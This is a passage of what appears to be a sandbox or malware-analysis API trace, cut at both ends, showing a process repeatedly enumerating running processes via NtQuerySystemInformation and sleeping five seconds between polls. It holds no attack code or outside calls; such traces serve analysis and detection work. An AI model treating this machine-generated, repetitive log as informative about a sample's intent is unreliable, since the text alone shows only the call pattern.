returned 0x0 [0278.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.158] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.169] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.179] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.188] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.197] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.289] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.314] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.333] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.342] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 